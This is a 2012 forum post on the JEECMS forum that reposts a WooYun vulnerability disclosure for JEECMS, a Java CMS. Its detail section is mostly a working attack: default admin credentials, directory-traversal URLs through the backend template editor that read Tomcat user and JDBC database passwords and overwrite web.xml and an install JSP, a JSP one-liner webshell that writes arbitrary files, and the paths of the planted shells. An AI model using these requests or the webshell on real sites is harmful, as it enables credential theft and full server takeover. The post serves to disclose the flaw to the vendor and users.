JEECMS后台任意文件编辑漏洞and官方漏洞及拿shell - JEECMS官方论坛|开源java cms,jsp cms,jsp bbs

181391907

级别: 童生

UID: 25523
积分:31 加为好友
威望: 0 精华: 0
主题:2 回复:15
注册时间:2011-11-08
在线时长:0

1# 发表于:2012-04-02 23:31:37 IP:27.84.*.*

漏洞概要

缺陷编号： WooYun-2012-04030

漏洞标题： JEECMS后台任意文件编辑漏洞and官方漏洞及拿shell

相关厂商： JEECMS

漏洞作者：随风.潜入夜

提交时间： 2012-01-27

公开时间： 2012-01-27

漏洞类型：任意文件遍历/下载

危害等级：高

自评Rank： 15

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org

Tags标签：任意文件读取利用默认后台JEECMS默认密码任意文件写入利用
漏洞详情

披露状态：

2012-01-27：积极联系厂商并且等待厂商认领中，细节不对外公开
2012-01-27：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

JEECMS后台任意文件编辑漏洞以及官方的demo站、官方服务器安全问题

详细说明：

2.x后台：
login/Jeecms.do
3.x后台：
jeeadmin/jeecms/index.do

默认账户：admin
默认密码：password

获取tomcat密码：
/jeeadmin/jeecms/template/v_edit.do?root=../../conf/&name=../../conf/tomcat-users.xml

获取JDBC数据库账号密码：
/jeeadmin/jeecms/template/v_edit.do?root=%2FWEB-INF%2Fconfig%2F&name=%2FWEB-INF%2Fconfig%2Fjdbc.properties
JEECMS2.x版读取路径：
admin/core/template/Com_edit.do?relPath=\../../../classes/jdbc.properties

修改web.xml取消对jsp的过滤：
/jeeadmin/jeecms/template/v_edit.do?root=%2FWEB-INF%2F&name=%2FWEB-INF%2Fweb.xml
JEECMS2.x版读取路径：
admin/core/template/Com_edit.do?relPath=\../../../web.xml

修改install/install_setup.jsp：
/jeeadmin/jeecms/template/v_edit.do?root=%2Finstall%2F&name=%2Finstall%2Finstall_setup.jsp
JEECMS2.x版读取路径：
admin/core/template/Com_edit.do?relPath=\../../../../install\install_setup.jsp

插入Jsp一句话：
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter

("f"))).write(request.getParameter("t").getBytes());
%>

修改后的一句话目录
/install/install_setup.jsp

一句话连接成功后的jsp大马目录：
/ma.jsp

漏洞证明：

修复方案：

修复：还是先修复下官方服务器吧、你懂的

版权声明：转载请注明来源随风.潜入夜@乌云

--------------------------------------------------------------------------------

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞Rank：10 (WooYun评价)

来源：http://www.2cto.com/Article/201201/117694.html

网上看到，第一时间转发，希望对JEECMS的发展有帮助！